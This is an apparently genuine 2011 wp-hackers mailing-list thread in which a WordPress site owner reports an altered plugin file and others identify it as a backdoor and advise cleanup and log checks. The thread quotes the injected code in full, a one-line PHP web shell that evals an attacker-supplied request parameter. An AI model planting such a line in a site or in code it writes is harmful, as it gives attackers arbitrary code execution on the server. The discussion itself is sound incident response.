[wp-hackers] Possible Exploit

Baki Goxhaj banago at gmail.com
Sun Jun 12 13:00:30 UTC 2011 

Wrote to my hosting account. This is what they are saying:

Due to the clustered structure of our systems there is no single log file
> for you to use as your site is served by many servers.I would suggest you to
> please make a full audit of your account in that regards and remove the
> malicious code if you find any.
>

Crazy - I have like 15 websites on there.

Kindly,

Baki Goxhaj
www.wplancer.com | proverbhunter.com | www.banago.info<http://proverbhunter.com>


On Sun, Jun 12, 2011 at 2:14 PM, Dion Hulse (dd32) <wordpress at dd32.id.au>wrote:

> Check your access logs for strange requests at the time the file was
> detected,  You'll hopefully be able to see a POST request to one of the
> plugin files at that point in time, or perhaps a long GET request, if you
> can narrow down the file attacked, you can work out which plugin has the
> vulnerability in it..
>
> On 12 June 2011 21:59, Baki Goxhaj <banago at gmail.com> wrote:
>
> > I removed it as soon I found out about it. I hope my other installs are
> not
> > infected as I don't have the file monitor running there.
> >
> > Kindly,
> >
> > Baki Goxhaj
> > www.wplancer.com | proverbhunter.com | www.banago.info<
> > http://proverbhunter.com>
> >
> >
> > On Sun, Jun 12, 2011 at 1:56 PM, Jon Cave <jon at lionsgoroar.co.uk> wrote:
> >
> > > n Sun, Jun 12, 2011 at 12:45 PM, Baki Goxhaj <banago at gmail.com> wrote:
> > > > Just got an email from my file monitor plugin that a file had been
> > > changed -
> > > > it is an inactive plugin file, strangely enough. Here is the content
> of
> > > the
> > > > file now:
> > > >
> > > > <?php
> if(isset($_REQUEST['asc']))eval(stripslashes($_REQUEST['asc']));
> > ?>
> > > >
> > > > Is this something dangerous?
> > >
> > > Yes this is extremely dangerous. It's basically a backdoor to allow
> > > arbitrary PHP code execution on your server. You should remove that
> > > code immediately, change passwords, do a full cleanup, etc.
> > > _______________________________________________
> > > wp-hackers mailing list
> > > wp-hackers at lists.automattic.com
> > > http://lists.automattic.com/mailman/listinfo/wp-hackers
> > >
> > _______________________________________________
> > wp-hackers mailing list
> > wp-hackers at lists.automattic.com
> > http://lists.automattic.com/mailman/listinfo/wp-hackers
> >
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>

More information about the wp-hackers mailing list